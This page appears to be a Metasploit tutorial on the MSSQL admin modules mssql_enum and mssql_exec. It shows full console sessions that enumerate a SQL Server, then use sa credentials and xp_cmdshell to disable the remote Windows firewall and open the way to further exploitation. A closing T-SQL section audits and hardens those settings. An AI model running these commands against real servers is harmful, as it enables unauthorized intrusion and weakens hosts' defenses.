Metasploit Auxiliary Modules: Admin MSSQL

mssql_enum

The mssql_enum module is an admin module that takes a set of credentials and queries MSSQL for various configuration settings.

msf > use auxiliary/admin/mssql/mssql_enum
msf auxiliary(mssql_enum) > show options

Module options (auxiliary/admin/mssql/mssql_enum):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   PASSWORD                              no        The password for the specified username
   RHOST                                 yes       The target address
   RPORT                1433             yes       The target port (TCP)
   TDSENCRYPTION        false            yes       Use TLS/SSL for TDS data "Force Encryption"
   USERNAME             sa               no        The username to authenticate as
   USE_WINDOWS_AUTHENT  false            yes       Use windows authentification (requires DOMAIN option set)

 

To configure the module, we accept the default username, set our PASSWORD and RHOST, and let it run.

msf auxiliary(mssql_enum) > set PASSWORD password1
PASSWORD => password1
msf auxiliary(mssql_enum) > set RHOST 192.168.1.195
RHOST => 192.168.1.195
msf auxiliary(mssql_enum) > run

[*] Running MS SQL Server Enumeration...
[*] Version:
[*]	Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) 
[*]		Oct 14 2005 00:33:37 
[*]		Copyright (c) 1988-2005 Microsoft Corporation
[*]		Express Edition on Windows NT 5.1 (Build 2600: Service Pack 2)
[*] Configuration Parameters:
[*] 	C2 Audit Mode is Not Enabled
[*] 	xp_cmdshell is Not Enabled
[*] 	remote access is Enabled
[*] 	allow updates is Not Enabled
[*] 	Database Mail XPs is Not Enabled
[*] 	Ole Automation Procedures are Not Enabled
[*] Databases on the server:
[*] 	Database name:master
[*] 	Database Files for master:
[*] 		c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\DATA\master.mdf
[*] 		c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\DATA\mastlog.ldf
[*] 	Database name:tempdb
[*] 	Database Files for tempdb:
[*] 		c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\DATA\tempdb.mdf
[*] 		c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\DATA\templog.ldf
[*] 	Database name:model
[*] 	Database Files for model:
[*] 		c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\DATA\model.mdf
[*] 		c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\DATA\modellog.ldf
[*] 	Database name:msdb
[*] 	Database Files for msdb:
[*] 		c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\DATA\MSDBData.mdf
[*] 		c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\DATA\MSDBLog.ldf
[*] System Logins on this Server:
[*] 	sa
[*] 	##MS_SQLResourceSigningCertificate##
[*] 	##MS_SQLReplicationSigningCertificate##
[*] 	##MS_SQLAuthenticatorCertificate##
[*] 	##MS_AgentSigningCertificate##
[*] 	BUILTIN\Administrators
[*] 	NT AUTHORITY\SYSTEM
[*] 	V-MAC-XP\SQLServer2005MSSQLUser$V-MAC-XP$SQLEXPRESS
[*] 	BUILTIN\Users
[*] Disabled Accounts:
[*] 	No Disabled Logins Found
[*] No Accounts Policy is set for:
[*] 	All System Accounts have the Windows Account Policy Applied to them.
[*] Password Expiration is not checked for:
[*] 	sa
[*] System Admin Logins on this Server:
[*] 	sa
[*] 	BUILTIN\Administrators
[*] 	NT AUTHORITY\SYSTEM
[*] 	V-MAC-XP\SQLServer2005MSSQLUser$V-MAC-XP$SQLEXPRESS
[*] Windows Logins on this Server:
[*] 	NT AUTHORITY\SYSTEM
[*] Windows Groups that can logins on this Server:
[*] 	BUILTIN\Administrators
[*] 	V-MAC-XP\SQLServer2005MSSQLUser$V-MAC-XP$SQLEXPRESS
[*] 	BUILTIN\Users
[*] Accounts with Username and Password being the same:
[*] 	No Account with its password being the same as its username was found.
[*] Accounts with empty password:
[*] 	No Accounts with empty passwords where found.
[*] Stored Procedures with Public Execute Permission found:
[*] 	sp_replsetsyncstatus
[*] 	sp_replcounters
[*] 	sp_replsendtoqueue
[*] 	sp_resyncexecutesql
[*] 	sp_prepexecrpc
[*] 	sp_repltrans
[*] 	sp_xml_preparedocument
[*] 	xp_qv
[*] 	xp_getnetname
[*] 	sp_releaseschemalock
[*] 	sp_refreshview
[*] 	sp_replcmds
[*] 	sp_unprepare
[*] 	sp_resyncprepare
[*] 	sp_createorphan
[*] 	xp_dirtree
[*] 	sp_replwritetovarbin
[*] 	sp_replsetoriginator
[*] 	sp_xml_removedocument
[*] 	sp_repldone
[*] 	sp_reset_connection
[*] 	xp_fileexist
[*] 	xp_fixeddrives
[*] 	sp_getschemalock
[*] 	sp_prepexec
[*] 	xp_revokelogin
[*] 	sp_resyncuniquetable
[*] 	sp_replflush
[*] 	sp_resyncexecute
[*] 	xp_grantlogin
[*] 	sp_droporphans
[*] 	xp_regread
[*] 	sp_getbindtoken
[*] 	sp_replincrementlsn
[*] Instances found on this server:
[*] 	SQLEXPRESS
[*] Default Server Instance SQL Server Service is running under the privilege of:
[*] 	xp_regread might be disabled in this system
[*] Auxiliary module execution completed
msf auxiliary(mssql_enum) >

 

mssql_exec

The mssql_exec admin module takes advantage of the xp_cmdshell stored procedure to execute commands on the remote system. If you have acquired or guessed MSSQL admin credentials, this can be a very useful module.

msf > use auxiliary/admin/mssql/mssql_exec
msf auxiliary(mssql_exec) > show options

Module options (auxiliary/admin/mssql/mssql_exec):

   Name                 Current Setting                       Required  Description
   ----                 ---------------                       --------  -----------
   CMD                  cmd.exe /c echo OWNED > C:\owned.exe  no        Command to execute
   PASSWORD                                                   no        The password for the specified username
   RHOST                                                      yes       The target address
   RPORT                1433                                  yes       The target port (TCP)
   TDSENCRYPTION        false                                 yes       Use TLS/SSL for TDS data "Force Encryption"
   USERNAME             sa                                    no        The username to authenticate as
   USE_WINDOWS_AUTHENT  false                                 yes       Use windows authentification (requires DOMAIN option set)

 

We set our RHOST and PASSWORD values and set CMD to disable the Windows Firewall on the remote system. This can potentially allow us to exploit other services running on the target.

msf auxiliary(mssql_exec) > set CMD netsh firewall set opmode disable
CMD => netsh firewall set opmode disable
msf auxiliary(mssql_exec) > set PASSWORD password1
PASSWORD => password1
msf auxiliary(mssql_exec) > set RHOST 192.168.1.195
RHOST => 192.168.1.195
msf auxiliary(mssql_exec) > run

[*] The server may have xp_cmdshell disabled, trying to enable it...
[*] SQL Query: EXEC master..xp_cmdshell 'netsh firewall set opmode disable'



 output
 ------
 Ok.
 
 

[*] Auxiliary module execution completed
msf auxiliary(mssql_exec) >
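The settings mssql_enum reports (the configuration parameters, the sa login's password policy, the procedures that public may execute, the sysadmin logins) and the xp_cmdshell dependency that mssql_exec relies on can be checked and corrected from the server side by a DBA. The following T-SQL audit is an added example, not part of the original tutorial; it assumes a login with sysadmin (or ALTER SETTINGS) rights and a SQL Server 2005 or later instance.

```sql
-- Added example (not from the original tutorial): server-side audit of the
-- settings mssql_enum enumerates, plus remediation for xp_cmdshell.
USE master;

-- 1. Configuration parameters mssql_enum lists; value_in_use = 1 means enabled.
--    xp_cmdshell and Ole Automation Procedures are the ones that allow OS-level
--    command execution from a SQL login, which is what mssql_exec depends on.
SELECT name,
       CAST(value_in_use AS int) AS value_in_use,
       CASE WHEN CAST(value_in_use AS int) = 1 THEN 'REVIEW' ELSE 'ok' END AS verdict
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'Ole Automation Procedures', 'Database Mail XPs',
               'remote access', 'allow updates', 'c2 audit mode');

-- 2. SQL logins without Windows password policy / expiration enforcement
--    (mssql_enum flagged sa under "Password Expiration is not checked for").
SELECT name, is_disabled, is_policy_checked, is_expiration_checked
FROM sys.sql_logins
WHERE is_policy_checked = 0 OR is_expiration_checked = 0;

-- 3. Extended (type X) and regular (type P) stored procedures in master that
--    the public role is granted EXECUTE on; compare with mssql_enum's list.
SELECT o.name, o.type_desc
FROM sys.database_permissions AS p
JOIN sys.all_objects AS o ON p.major_id = o.object_id
WHERE p.grantee_principal_id = DATABASE_PRINCIPAL_ID('public')
  AND p.class = 1                      -- object-level permission
  AND p.permission_name = 'EXECUTE'
  AND p.state IN ('G', 'W')            -- GRANT / GRANT WITH GRANT OPTION
  AND o.type IN ('P', 'X')
ORDER BY o.name;

-- 4. Remediation: switch xp_cmdshell off again. Note that any sysadmin can
--    re-enable it exactly as mssql_exec does, so step 5 matters as much.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;

-- 5. Members of the sysadmin fixed server role (mssql_enum's
--    "System Admin Logins on this Server").
SELECT sp.name, sp.type_desc, sp.is_disabled
FROM sys.server_role_members AS rm
JOIN sys.server_principals AS r  ON rm.role_principal_id   = r.principal_id
JOIN sys.server_principals AS sp ON rm.member_principal_id = sp.principal_id
WHERE r.name = 'sysadmin';
```

Running the audit on a schedule and alerting when step 1 returns 'REVIEW' for xp_cmdshell gives a simple detection for the enable-then-execute sequence shown in the mssql_exec output above.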

Published: 2018-06-13 20:29:28  Category: Metasploit
Last updated: 2018-06-13 20:29:28
Author: 付杰